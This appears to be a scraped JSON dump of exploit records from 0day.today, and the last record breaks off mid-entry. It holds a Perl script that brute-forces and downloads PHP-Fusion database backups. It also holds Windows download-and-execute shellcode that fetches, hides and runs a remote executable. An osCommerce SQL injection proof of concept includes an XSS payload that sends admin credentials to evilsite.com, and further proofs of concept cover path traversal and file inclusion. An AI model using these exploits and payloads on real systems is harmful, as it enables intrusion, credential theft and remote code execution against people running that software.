{"type": "zdt", "lastseen": "2016-04-20T01:45:32", "bulletinFamily": "exploit", "cvelist": [], "history": [], "title": "PHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit", "published": "2005-06-25T00:00:00", "href": "http://0day.today/exploit/description/139", "cvss": {"vector": "NONE", "score": 0.0}, "description": "Exploit for unknown platform in category web applications", "hash": "241f2f994a8e8f236f57942fb8326b4ee6761facccb64e30527c626cd5f510d8", "references": [], "objectVersion": "1.0", "edition": 1, "sourceData": "===================================================================\r\nPHP-Fusion <= 6.00.105 Accessible Database Backups Download Exploit\r\n===================================================================\r\n\r\n\r\n\r\n\r\n\r\n #!/usr/bin/perl\r\n ######################################################\r\n # D A R K A S S A S S I N S C R E W 2 0 0 5 #\r\n ######################################################\r\n # Dark Assassins - http://dark-assassins.com/ #\r\n # Visit us on IRC @ irc.tddirc.net #DarkAssassins #\r\n ######################################################\r\n # phpfusiondb.pl; Version 0.1 22/06/05 #\r\n # PHP-Fusion db backup proof-of-concept by Easyex #\r\n # Database backup vuln in v6.00.105 and below #\r\n ######################################################\r\n # Description: When a db (database) backup is made #\r\n # it is saved in /administration/db_backups/ on 6.0 #\r\n # and on 5.0 it is saved in /fusion_admin/db_backups/#\r\n # The backup file can be saved in 2 formats: .sql or #\r\n # .sql.gz and is hidden by a blank index.php file but#\r\n # can be downloaded client-side, The filename is for #\r\n # example : backup_2005-06-22_2208.sql.gz so what we #\r\n # can do is generate 0001 to 9999 and request the #\r\n # file and download it. If a db file is found an #\r\n # attacker can get the admin hash and crack it or #\r\n # retrieve other sensitive information from the db! #\r\n ######################################################\r\n\r\n # 9999 requests to the host is alot, And would get noticed in the server log!\r\n # If you re-coded your own script with proxy support you would be fine.\r\n # You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly \r\n # backup the php-fusiondatabase.\r\n\r\n my $wget='wget';\r\n\r\n my $count='0';\r\n\r\n my $target;\r\n\r\n if (@ARGV < 4)\r\n{\r\n print \"\\n\";\r\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\r\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\r\n print \"\\n\";\r\n print \"Usage: phpfusiondb.pl <host> <version> <file> <extension>\\n\";\r\n print \"Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\\n\";\r\n print \"\\n\";\r\n exit();\r\n}\r\n\r\n my $host = $ARGV[0];\r\n my $ver = $ARGV[1];\r\n my $file = $ARGV[2];\r\n my $extension = $ARGV[3];\r\n\r\n if ($ver eq \"6\") {\r\n $dir='/administration/db_backups/'; # Directory path to the 6.X backup folder\r\n }\r\n\r\n if ($ver eq \"5\") {\r\n $dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder\r\n}\r\n\r\n print \"\\n\";\r\n print \"Welcome to the PHP-Fusion db backup vulnerability\\n\";\r\n print \"Coded by Easyex from the Dark Assassins crew\\n\";\r\n print \"\\n\";\r\n\r\n print \"Host: $host\\n\";\r\n print \"Directory: $dir\\n\";\r\n print \"File: $file + 0001 to 9999\\n\";\r\n print \"Extension: $extension\\n\";\r\n print \"\\n\";\r\n print \"Attempting to find a db backup file on $host\\n\";\r\n\r\n for($count=0;$count<9999;$count++) {\r\n\r\n $target=$host.$dir.$file.sprintf(\"%04d\", $count).$extension;\r\n\r\n system(\"$wget $target\");\r\n }\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "id": "1337DAY-ID-139", "sourceHref": "http://0day.today/exploit/139", "modified": "2005-06-25T00:00:00", "reporter": "Easyex", "viewCount": 16, "enchantments": {"vulnersScore": 3.6}}
{"result": {"zdt": [{"lastseen": "2016-07-16T00:59:34", "references": [], "description": "Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() shellcode.", "edition": 1, "reporter": "Roziul Hasan Khan Shifat", "published": "2016-07-15T00:00:00", "type": "zdt", "title": "Windows/x86 Download / Execute Shellcode", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-07-15T00:00:00", "href": "http://0day.today/exploit/description/25698", "id": "1337DAY-ID-25698", "sourceData": "/*\r\n Title : Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() shellcode\r\n Date : 12-07-2016\r\n Author : Roziul Hasan Khan Shifat\r\n Tested on: Windows 7 x86\r\n \r\n \r\n*/\r\n \r\n/*\r\n \r\n \r\nDisassembly of section .text:\r\n \r\n00000000 <_start>:\r\n 0: 31 c9 xor %ecx,%ecx\r\n 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax\r\n 6: 8b 40 0c mov 0xc(%eax),%eax\r\n 9: 8b 70 14 mov 0x14(%eax),%esi\r\n c: ad lods %ds:(%esi),%eax\r\n d: 96 xchg %eax,%esi\r\n e: ad lods %ds:(%esi),%eax\r\n f: 8b 48 10 mov 0x10(%eax),%ecx\r\n 12: 8b 59 3c mov 0x3c(%ecx),%ebx\r\n 15: 01 cb add %ecx,%ebx\r\n 17: 8b 5b 78 mov 0x78(%ebx),%ebx\r\n 1a: 01 cb add %ecx,%ebx\r\n 1c: 8b 73 20 mov 0x20(%ebx),%esi\r\n 1f: 01 ce add %ecx,%esi\r\n 21: 31 d2 xor %edx,%edx\r\n \r\n00000023 <count>:\r\n 23: 42 inc %edx\r\n 24: ad lods %ds:(%esi),%eax\r\n 25: 01 c8 add %ecx,%eax\r\n 27: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)\r\n 2d: 75 f4 jne 23 <count>\r\n 2f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)\r\n 36: 75 eb jne 23 <count>\r\n 38: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)\r\n 3f: 75 e2 jne 23 <count>\r\n 41: 8b 73 1c mov 0x1c(%ebx),%esi\r\n 44: 01 ce add %ecx,%esi\r\n 46: 8b 14 96 mov (%esi,%edx,4),%edx\r\n 49: 01 ca add %ecx,%edx\r\n 4b: 31 f6 xor %esi,%esi\r\n 4d: 89 d6 mov %edx,%esi\r\n 4f: 89 cf mov %ecx,%edi\r\n 51: 31 c0 xor %eax,%eax\r\n 53: 50 push %eax\r\n 54: 68 61 72 79 41 push $0x41797261\r\n 59: 68 4c 69 62 72 push $0x7262694c\r\n 5e: 68 4c 6f 61 64 push $0x64616f4c\r\n 63: 54 push %esp\r\n 64: 51 push %ecx\r\n 65: ff d2 call *%edx\r\n 67: 83 c4 0c add $0xc,%esp\r\n 6a: 31 c9 xor %ecx,%ecx\r\n 6c: 68 6c 6c 41 41 push $0x41416c6c\r\n 71: 88 4c 24 02 mov %cl,0x2(%esp)\r\n 75: 68 6f 6e 2e 64 push $0x642e6e6f\r\n 7a: 68 75 72 6c 6d push $0x6d6c7275\r\n 7f: 54 push %esp\r\n 80: ff d0 call *%eax\r\n 82: 83 c4 0c add $0xc,%esp\r\n 85: 31 c9 xor %ecx,%ecx\r\n 87: 68 65 41 42 42 push $0x42424165\r\n 8c: 88 4c 24 02 mov %cl,0x2(%esp)\r\n 90: 68 6f 46 69 6c push $0x6c69466f\r\n 95: 68 6f 61 64 54 push $0x5464616f\r\n 9a: 68 6f 77 6e 6c push $0x6c6e776f\r\n 9f: 68 55 52 4c 44 push $0x444c5255\r\n a4: 54 push %esp\r\n a5: 50 push %eax\r\n a6: ff d6 call *%esi\r\n a8: 83 c4 14 add $0x14,%esp\r\n ab: 50 push %eax\r\n \r\n000000ac <download>:\r\n ac: 58 pop %eax\r\n ad: 31 c9 xor %ecx,%ecx\r\n af: 51 push %ecx\r\n b0: 68 2e 65 78 65 push $0x6578652e\r\n b5: 68 6d 70 6c 65 push $0x656c706d\r\n ba: 68 30 2f 73 61 push $0x61732f30\r\n bf: 68 36 2e 31 33 push $0x33312e36\r\n c4: 68 36 38 2e 38 push $0x382e3836\r\n c9: 68 39 32 2e 31 push $0x312e3239\r\n ce: 68 3a 2f 2f 31 push $0x312f2f3a\r\n d3: 68 68 74 74 70 push $0x70747468\r\n d8: 54 push %esp\r\n d9: 59 pop %ecx\r\n da: 31 db xor %ebx,%ebx\r\n dc: 53 push %ebx\r\n dd: 68 2e 65 78 65 push $0x6578652e\r\n e2: 68 70 79 6c 64 push $0x646c7970\r\n e7: 54 push %esp\r\n e8: 5b pop %ebx\r\n e9: 31 d2 xor %edx,%edx\r\n eb: 50 push %eax\r\n ec: 52 push %edx\r\n ed: 52 push %edx\r\n ee: 53 push %ebx\r\n ef: 51 push %ecx\r\n f0: 52 push %edx\r\n f1: ff d0 call *%eax\r\n f3: 59 pop %ecx\r\n f4: 83 c4 2c add $0x2c,%esp\r\n f7: 31 d2 xor %edx,%edx\r\n f9: 39 d0 cmp %edx,%eax\r\n fb: 51 push %ecx\r\n fc: 75 ae jne ac <download>\r\n fe: 5a pop %edx\r\n ff: 31 d2 xor %edx,%edx\r\n 101: 68 73 41 42 42 push $0x42424173\r\n 106: 88 54 24 02 mov %dl,0x2(%esp)\r\n 10a: 68 62 75 74 65 push $0x65747562\r\n 10f: 68 74 74 72 69 push $0x69727474\r\n 114: 68 69 6c 65 41 push $0x41656c69\r\n 119: 68 53 65 74 46 push $0x46746553\r\n 11e: 54 push %esp\r\n 11f: 57 push %edi\r\n 120: ff d6 call *%esi\r\n 122: 83 c4 14 add $0x14,%esp\r\n 125: 31 c9 xor %ecx,%ecx\r\n 127: 51 push %ecx\r\n 128: 68 2e 65 78 65 push $0x6578652e\r\n 12d: 68 70 79 6c 64 push $0x646c7970\r\n 132: 54 push %esp\r\n 133: 59 pop %ecx\r\n 134: 31 d2 xor %edx,%edx\r\n 136: 83 c2 02 add $0x2,%edx\r\n 139: 52 push %edx\r\n 13a: 51 push %ecx\r\n 13b: ff d0 call *%eax\r\n 13d: 83 c4 08 add $0x8,%esp\r\n 140: 31 c9 xor %ecx,%ecx\r\n 142: 68 78 65 63 41 push $0x41636578\r\n 147: 88 4c 24 03 mov %cl,0x3(%esp)\r\n 14b: 68 57 69 6e 45 push $0x456e6957\r\n 150: 54 push %esp\r\n 151: 57 push %edi\r\n 152: ff d6 call *%esi\r\n 154: 83 c4 08 add $0x8,%esp\r\n 157: 31 c9 xor %ecx,%ecx\r\n 159: 51 push %ecx\r\n 15a: 68 2e 65 78 65 push $0x6578652e\r\n 15f: 68 70 79 6c 64 push $0x646c7970\r\n 164: 54 push %esp\r\n 165: 59 pop %ecx\r\n 166: 31 d2 xor %edx,%edx\r\n 168: 52 push %edx\r\n 169: 51 push %ecx\r\n 16a: ff d0 call *%eax\r\n 16c: 83 c4 08 add $0x8,%esp\r\n 16f: 31 c9 xor %ecx,%ecx\r\n 171: 68 65 73 73 41 push $0x41737365\r\n 176: 88 4c 24 03 mov %cl,0x3(%esp)\r\n 17a: 68 50 72 6f 63 push $0x636f7250\r\n 17f: 68 45 78 69 74 push $0x74697845\r\n 184: 54 push %esp\r\n 185: 57 push %edi\r\n 186: ff d6 call *%esi\r\n 188: ff d0 call *%eax\r\n \r\n \r\n*/\r\n \r\n \r\n \r\n/*\r\n \r\nsection .text\r\n global _start\r\n_start:\r\n \r\nxor ecx,ecx\r\nmov eax,[fs:ecx+0x30] ;Eax=PEB\r\nmov eax,[eax+0xc] ;eax=PEB.Ldr\r\nmov esi,[eax+0x14] ;esi=PEB.Ldr->InMemOrderModuleList\r\nlodsd \r\nxchg esi,eax\r\nlodsd\r\nmov ecx,[eax+0x10] ;ecx=kernel32.dll base address\r\n;------------------------------------\r\n \r\nmov ebx,[ecx+0x3c] ;kernel32.dll +0x3c=DOS->e_flanew\r\nadd ebx,ecx ;ebx=PE HEADER\r\nmov ebx,[ebx+0x78];Data_DIRECTORY->VirtualAddress\r\nadd ebx,ecx ;IMAGE_EXPORT_DIRECTORY\r\n \r\nmov esi,[ebx+0x20] ;AddressOfNames\r\nadd esi,ecx\r\n;------------------------------------------\r\nxor edx,edx\r\n \r\ncount:\r\ninc edx\r\nlodsd\r\nadd eax,ecx\r\ncmp dword [eax],'GetP'\r\njnz count\r\ncmp dword [eax+4],'rocA'\r\njnz count\r\ncmp dword [eax+8],'ddre'\r\njnz count\r\n \r\n;---------------------------------------------\r\n \r\nmov esi,[ebx+0x1c] ;AddressOfFunctions\r\nadd esi,ecx\r\n \r\nmov edx,[esi+edx*4]\r\nadd edx,ecx ;edx=GetProcAddress()\r\n \r\n;-----------------------------------------\r\n \r\nxor esi,esi\r\nmov esi,edx ;GetProcAddress()\r\nmov edi,ecx ;kernel32.dll\r\n \r\n;------------------------------------\r\n;finding address of LoadLibraryA()\r\nxor eax,eax\r\npush eax\r\npush 0x41797261\r\npush 0x7262694c\r\npush 0x64616f4c\r\n \r\npush esp\r\npush ecx\r\n \r\ncall edx\r\n \r\n;------------------------\r\nadd esp,12\r\n;-----------------------------\r\n \r\n;LoadLibraryA(\"urlmon.dll\")\r\nxor ecx,ecx\r\n \r\npush 0x41416c6c\r\nmov [esp+2],byte cl\r\npush 0x642e6e6f\r\npush 0x6d6c7275\r\n \r\npush esp\r\ncall eax\r\n \r\n;-----------------------\r\n \r\nadd esp,12\r\n;-----------------------\r\n;finding address of URLDownloadToFileA()\r\nxor ecx,ecx\r\npush 0x42424165\r\nmov [esp+2],byte cl\r\npush 0x6c69466f\r\npush 0x5464616f\r\npush 0x6c6e776f\r\npush 0x444c5255\r\n \r\npush esp\r\npush eax\r\ncall esi\r\n \r\n;------------------------\r\nadd esp,20\r\npush eax \r\n;---------------------------------------\r\n;URLDownloadToFileA(NULL,url,save as,0,NULL)\r\ndownload:\r\npop eax\r\nxor ecx,ecx\r\npush ecx\r\n \r\n;-----------------------------\r\n;change it to file url\r\n \r\npush 0x6578652e\r\npush 0x656c706d\r\npush 0x61732f30\r\npush 0x33312e36\r\npush 0x382e3836\r\npush 0x312e3239\r\npush 0x312f2f3a\r\npush 0x70747468\r\n;-----------------------------------\r\n \r\n \r\npush esp \r\npop ecx ;url http://192.168.86.130/sample.exe\r\n \r\nxor ebx,ebx\r\npush ebx\r\n \r\n;------------------------\r\n;save as (no need change it.if U want to change it,do it)\r\npush 0x6578652e\r\npush 0x646c7970\r\n;-------------------------------\r\npush esp ;pyld.exe\r\npop ebx ;save as\r\n \r\nxor edx,edx\r\npush eax\r\npush edx\r\npush edx\r\npush ebx\r\npush ecx\r\npush edx\r\n \r\ncall eax\r\n \r\n;-------------------------\r\n \r\npop ecx\r\nadd esp,44\r\nxor edx,edx\r\ncmp eax,edx\r\npush ecx\r\njnz download ;if it fails to download , retry contineusly\r\n;------------------\r\npop edx\r\n \r\n;-----------------------\r\n;Finding address of SetFileAttributesA()\r\nxor edx,edx\r\n \r\n \r\npush 0x42424173\r\nmov [esp+2],byte dl\r\npush 0x65747562\r\npush 0x69727474\r\npush 0x41656c69\r\npush 0x46746553\r\n \r\npush esp\r\npush edi\r\n \r\ncall esi\r\n \r\n;--------------------------------\r\n \r\nadd esp,20 ;U must adjust stack or it will crash\r\n;--------------------\r\n;calling SetFileAttributesA(\"pyld.exe\",FILE_ATTRIBUTE_HIDDEN) \r\nxor ecx,ecx\r\npush ecx\r\npush 0x6578652e\r\npush 0x646c7970\r\n \r\npush esp\r\npop ecx\r\n \r\nxor edx,edx\r\nadd edx,2 ;FILE_ATTRIBUTE_HIDDEN\r\n \r\npush edx\r\npush ecx\r\n \r\ncall eax\r\n \r\n;-------------------\r\n \r\nadd esp,8\r\n;---------------------------\r\n \r\n;finding address of WinExec()\r\nxor ecx,ecx\r\n \r\npush 0x41636578\r\nmov [esp+3],byte cl\r\npush 0x456e6957\r\n \r\npush esp\r\npush edi\r\ncall esi\r\n \r\n;----------------------\r\n \r\nadd esp,8\r\n \r\n;------------------------\r\n;calling WinExec(\"pyld.exe\",0)\r\nxor ecx,ecx\r\npush ecx\r\npush 0x6578652e\r\npush 0x646c7970\r\n \r\npush esp\r\npop ecx\r\n \r\nxor edx,edx\r\npush edx\r\npush ecx\r\n \r\ncall eax\r\n;-------------------------\r\n \r\nadd esp,8\r\n;-----------------------------\r\n \r\n;finding address of ExitProcess()\r\nxor ecx,ecx\r\npush 0x41737365\r\nmov [esp+3],byte cl\r\npush 0x636f7250\r\npush 0x74697845\r\n \r\npush esp\r\npush edi\r\n \r\ncall esi\r\n \r\n;--------------\r\ncall eax\r\n \r\n \r\n \r\n*/\r\n \r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\nchar shellcode[]=\"\\x31\\xc9\\x64\\x8b\\x41\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x14\\xad\\x96\\xad\\x8b\\x48\\x10\\x8b\\x59\\x3c\\x01\\xcb\\x8b\\x5b\\x78\\x01\\xcb\\x8b\\x73\\x20\\x01\\xce\\x31\\xd2\\x42\\xad\\x01\\xc8\\x81\\x38\\x47\\x65\\x74\\x50\\x75\\xf4\\x81\\x78\\x04\\x72\\x6f\\x63\\x41\\x75\\xeb\\x81\\x78\\x08\\x64\\x64\\x72\\x65\\x75\\xe2\\x8b\\x73\\x1c\\x01\\xce\\x8b\\x14\\x96\\x01\\xca\\x31\\xf6\\x89\\xd6\\x89\\xcf\\x31\\xc0\\x50\\x68\\x61\\x72\\x79\\x41\\x68\\x4c\\x69\\x62\\x72\\x68\\x4c\\x6f\\x61\\x64\\x54\\x51\\xff\\xd2\\x83\\xc4\\x0c\\x31\\xc9\\x68\\x6c\\x6c\\x41\\x41\\x88\\x4c\\x24\\x02\\x68\\x6f\\x6e\\x2e\\x64\\x68\\x75\\x72\\x6c\\x6d\\x54\\xff\\xd0\\x83\\xc4\\x0c\\x31\\xc9\\x68\\x65\\x41\\x42\\x42\\x88\\x4c\\x24\\x02\\x68\\x6f\\x46\\x69\\x6c\\x68\\x6f\\x61\\x64\\x54\\x68\\x6f\\x77\\x6e\\x6c\\x68\\x55\\x52\\x4c\\x44\\x54\\x50\\xff\\xd6\\x83\\xc4\\x14\\x50\\x58\\x31\\xc9\\x51\\x68\\x2e\\x65\\x78\\x65\\x68\\x6d\\x70\\x6c\\x65\\x68\\x30\\x2f\\x73\\x61\\x68\\x36\\x2e\\x31\\x33\\x68\\x36\\x38\\x2e\\x38\\x68\\x39\\x32\\x2e\\x31\\x68\\x3a\\x2f\\x2f\\x31\\x68\\x68\\x74\\x74\\x70\\x54\\x59\\x31\\xdb\\x53\\x68\\x2e\\x65\\x78\\x65\\x68\\x70\\x79\\x6c\\x64\\x54\\x5b\\x31\\xd2\\x50\\x52\\x52\\x53\\x51\\x52\\xff\\xd0\\x59\\x83\\xc4\\x2c\\x31\\xd2\\x39\\xd0\\x51\\x75\\xae\\x5a\\x31\\xd2\\x68\\x73\\x41\\x42\\x42\\x88\\x54\\x24\\x02\\x68\\x62\\x75\\x74\\x65\\x68\\x74\\x74\\x72\\x69\\x68\\x69\\x6c\\x65\\x41\\x68\\x53\\x65\\x74\\x46\\x54\\x57\\xff\\xd6\\x83\\xc4\\x14\\x31\\xc9\\x51\\x68\\x2e\\x65\\x78\\x65\\x68\\x70\\x79\\x6c\\x64\\x54\\x59\\x31\\xd2\\x83\\xc2\\x02\\x52\\x51\\xff\\xd0\\x83\\xc4\\x08\\x31\\xc9\\x68\\x78\\x65\\x63\\x41\\x88\\x4c\\x24\\x03\\x68\\x57\\x69\\x6e\\x45\\x54\\x57\\xff\\xd6\\x83\\xc4\\x08\\x31\\xc9\\x51\\x68\\x2e\\x65\\x78\\x65\\x68\\x70\\x79\\x6c\\x64\\x54\\x59\\x31\\xd2\\x52\\x51\\xff\\xd0\\x83\\xc4\\x08\\x31\\xc9\\x68\\x65\\x73\\x73\\x41\\x88\\x4c\\x24\\x03\\x68\\x50\\x72\\x6f\\x63\\x68\\x45\\x78\\x69\\x74\\x54\\x57\\xff\\xd6\\xff\\xd0\";\r\n \r\nmain()\r\n{\r\nprintf(\"shellcode length %ld\\n\",(long)strlen(shellcode));\r\n(* (int(*)()) shellcode) ();\r\n}\n\n# 0day.today [2016-07-16] #", "cvss": {"score": 0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/25698"}, {"lastseen": "2016-04-20T01:39:46", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "djrootdz", "published": "2016-01-26T00:00:00", "title": "osCommerce 2.3.3.4 - (geo_zones.php zID param) SQL Injection Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-01-26T00:00:00", "href": "http://0day.today/exploit/description/24852", "id": "1337DAY-ID-24852", "sourceData": "# Title: osCommerce v2.x SQL Injection Vulnerability\r\n# Dork: Powered by osCommerce\r\n# Author: Djroot-dz\r\n# Contact: djrootdz[at]gmail[dot]com - https://www.djroot.com/djroot.dz\r\n# Website: http://security1337.com\r\n# Vendor : http://www.oscommerce.com\r\n# Version: v2.3.3.4 (current latest release) and prior versions should be affected too \r\n \r\n- Vulnerable Code snippet in \"catalog/admin/geo_zones.php\":\r\n+--------------------------------------------------------------------------------------+\r\n- $$$$$ $$ $$$$$ $$$$$$$ -\r\n- $$ $$ $$$$ $$$$$ $$$$$$ $$$$$$ $$ $$ $$ $$ -\r\n- $$ $$ $$ $$ $$ $$ $$ $$ $$ $$$$$$ $$ $$ $$ -\r\n- $$ $$ $$ $$ $$ $$ $$ $$ $$ $$$$$$$ $$ $$ $$ -\r\n- $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ -\r\n- $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ $$ -\r\n- $$$$$ $$$$$ $$ $$$$$$ $$$$$$ $$$ $$$$$ $$$$$$$ -\r\n- -\r\n- *// Penetration Testing & Ethical Hacking //* -\r\n+--------------------------------------------------------------------------------------+ \r\n <?php\r\n [...]\r\n LINE 138: $rows = 0;\r\n LINE 139: $zones_query_raw = \"select a.association_id, a.zone_country_id, c.countries_name, a.zone_id, a.geo_zone_id, a.last_modified, \r\n a.date_added, z.zone_name from \" . TABLE_ZONES_TO_GEO_ZONES . \" a left join \" . TABLE_COUNTRIES . \" c on a.zone_country_id = c.countries_id \r\n left join \" . TABLE_ZONES . \" z on a.zone_id = z.zone_id where a.geo_zone_id = \" . $HTTP_GET_VARS['zID'] . \" order by association_id\";\r\n LINE 140: $zones_split = new splitPageResults($HTTP_GET_VARS['spage'], MAX_DISPLAY_SEARCH_RESULTS, $zones_query_raw, $zones_query_numrows);\r\n LINE 141: $zones_query = tep_db_query($zones_query_raw);\r\n [...]\r\n ?> \r\n \r\n As we can see at line 139 the GET zID parameter directly concatenated with the sql query \r\n without any type of sanitization which leads directly to sql injection vulnerability\r\n \r\n \r\n- Proof of Concept ( dump the admin username and password ): \r\n \r\n http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID=1 group by 1 union select 1,2,3,4,5,6,7,concat(user_name,0x3a,user_password) from administrators --\r\n \r\n \r\n- Exploitation & Attack Scenario:\r\n \r\n an authenticated admin account is required to successfully exploit the vulnerability\r\n but it can be combined with other attack vectors like XSS / CSRF to achieve more dangerous successful remote attack \r\n \r\n Example to steal the administrator username & password and send it to php logger at \"http://evilsite.com/logger.php?log=[ADMIN USER:HASH]\"\r\n \r\n We can use hybrid attack technique ( SQL Injection + XSS ) :\r\n \r\n http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID= 1 group by 1 union select 1,2,3,4,5,6,7,concat(0x3c6469762069643d2274657374223e,user_name,0x3d,user_password,0x3c2f6469763e3c7363726970743e646f63756d656e742e6c6f636174696f6e2e687265663d22687474703a2f2f6576696c736974652e636f6d2f6c6f676765722e7068703f6c6f673d222b242822237465737422292e68746d6c28293c2f7363726970743e) from administrators --\r\n \r\n \r\n- Mitigation:\r\n \r\n The vendor has released a quick fix for the vulnerability. It is strongly recommended to apply the patch now\r\n \r\n https://github.com/gburton/oscommerce2/commit/e4d90eccd7d9072ebe78da4c38fb048bfe31c902\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/24852", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-04-20T02:06:11", "references": [], "description": "Piwik version 2.14.3 and below suffer from a local file inclusion vulnerability.", "edition": 1, "reporter": "EgiX", "published": "2015-11-04T00:00:00", "type": "zdt", "title": "Piwik 2.14.3 Local File Inclusion Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7815"], "modified": "2015-11-04T00:00:00", "href": "http://0day.today/exploit/description/24496", "id": "1337DAY-ID-24496", "sourceData": "-----------------------------------------------------------------------\r\nPiwik <= 2.14.3 (viewDataTable) Autoloaded File Inclusion Vulnerability\r\n-----------------------------------------------------------------------\r\n\r\n\r\n[-] Software Link:\r\n\r\nhttps://piwik.org/\r\n\r\n\r\n[-] Affected Versions:\r\n\r\nVersion 2.14.3 and prior versions. \r\n\r\n\r\n[-] Vulnerability Description:\r\n\r\nThe vulnerable code is located in the /core/ViewDataTable/Factory.php script:\r\n\r\n130. $type = Common::getRequestVar('viewDataTable', $defaultType, 'string');\r\n131. \r\n132. // Common::getRequestVar removes backslashes from the defaultValue ...\r\n133. // therefore do not pass this as a default value to getRequestVar()\r\n134. if ('' === $type) {\r\n135. $type = $defaultType ?: HtmlTable::ID;\r\n136. }\r\n137. } else {\r\n138. $type = $defaultViewType;\r\n139. }\r\n140. \r\n141. $params['viewDataTable'] = $type;\r\n142. \r\n143. $visualizations = Manager::getAvailableViewDataTables();\r\n144. \r\n145. if (array_key_exists($type, $visualizations)) {\r\n146. return self::createViewDataTableInstance($visualizations[$type], ...\r\n147. }\r\n148. \r\n149. if (class_exists($type)) {\r\n\r\nUser input passed through the \"viewDataTable\" request parameter is not properly sanitized\r\nbefore being used in a call to the \"class_exists()\" function at line 149. This could be\r\nexploited to include arbitrary .php files located outside the Piwik root directory or\r\nfrom the Piwik codebase itself (possibly leading to unauthorized access to certain\r\nfunctionalities) leveraging the Composer autoloading function. Successful exploitation\r\nof this vulnerability requires the application running on PHP before 5.4.24 or 5.5.8.\r\n\r\n\r\n[-] Solution:\r\n\r\nUpdate to version 2.15.0 or later.\r\n\r\n\r\n[-] Disclosure Timeline:\r\n\r\n[25/08/2015] - Vendor notified\r\n[09/09/2015] - Issue fixed on the GitHub repository: http://git.io/vlyZv\r\n[06/10/2015] - CVE number requested\r\n[14/10/2015] - CVE number assigned\r\n[22/10/2015] - Version 2.15.0 released: https://piwik.org/changelog/piwik-2-15-0\r\n[04/11/2015] - Public disclosure\r\n\r\n\r\n[-] CVE Reference:\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org)\r\nhas assigned the name CVE-2015-7815 to this vulnerability.\r\n\r\n\r\n[-] Credits:\r\n\r\nVulnerability discovered by Egidio Romano.\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/24496", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-04-19T03:56:27", "references": [], "description": "WordPress Font plugin version 7.5 suffers from a path traversal vulnerability.", "edition": 1, "reporter": "David Moore", "published": "2015-10-13T00:00:00", "type": "zdt", "title": "WordPress Font 7.5 Path Traversal Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7683"], "modified": "2015-10-13T00:00:00", "href": "http://0day.today/exploit/description/24418", "id": "1337DAY-ID-24418", "sourceData": "Details\r\n================\r\nSoftware: Font\r\nVersion: 7.5\r\nHomepage: https://wordpress.org/plugins/font/\r\nCVE: CVE-2015-7683 (Pending)\r\nCVSS: 6.3 (Medium; AV:N/AC:M/Au:S/C:C/I:N/A:N)\r\nCWE: CWE-22\r\n\r\nDescription\r\n================\r\nAn absolute path traversal vulnerability in Font 7.5 allows WordPress admins read access to system files such as /etc/passwd. Font is a WordPress plugin with over 40,000 active installs.\r\n\r\nVulnerability\r\n================\r\nThe vulnerability is due to the unsanitized POST parameter 'url' being passed to file_get_contents() via file_get_contents2().\r\n\r\n>From font/Font.php:\r\n139: $contents = $this->file_get_contents2($_POST['url'], array_merge($dataArr, $serializedArr));\r\n. . .\r\n515: function file_get_contents2($src, $postData = false) {\r\n. . .\r\n550: $fileContents = @file_get_contents($src, false, $context);\r\n\r\nProof of Concept\r\n================\r\nURL: http://localhost/wordpress/wp-content/plugins/font/AjaxProxy.php\r\n\r\nPOST data:\r\nurl=/etc/passwd&data%5Bblogurl%5D=http%3A%2F%2Flocalhost%2Fwordpress&data%5Bversion%5D=7.5&format=json&action=cross_domain_request\r\n\r\nRemediation\r\n================\r\nUpgrade the plugin to version 7.5.1 or higher.\r\n\r\nTimeline\r\n================\r\n2015-09-29: Discovered\r\n2015-09-30: Contacted vendor via plugin support form\r\n2015-10-01: Reported vulnerability to wordpress.org\r\n2015-10-02: CVE-2015-7683 assigned\r\n2015-10-04: Vendor releases version 7.5.1 - confirmed fixed\r\n2015-10-12: Public Disclosure\r\n\r\nReferences\r\n================\r\n[1] https://cwe.mitre.org/data/definitions/22.html\r\n\r\nDiscovered by\r\n================\r\nDavid Moore @grajagandev\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 4, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "http://0day.today/exploit/24418"}, {"lastseen": "2016-04-20T00:29:32", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "Smash_", "published": "2015-08-29T00:00:00", "type": "zdt", "title": "phpwiki 1.5.4 - Cross Site Scripting / Local File Inclusion Vulnerabilities", "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-08-29T00:00:00", "href": "http://0day.today/exploit/description/24168", "id": "1337DAY-ID-24168", "sourceData": "# Title: phpwiki 1.5.4 - Cross Site Scripting / Local File Inclusion\r\n# Date: 29.08.15\r\n# Vendor: 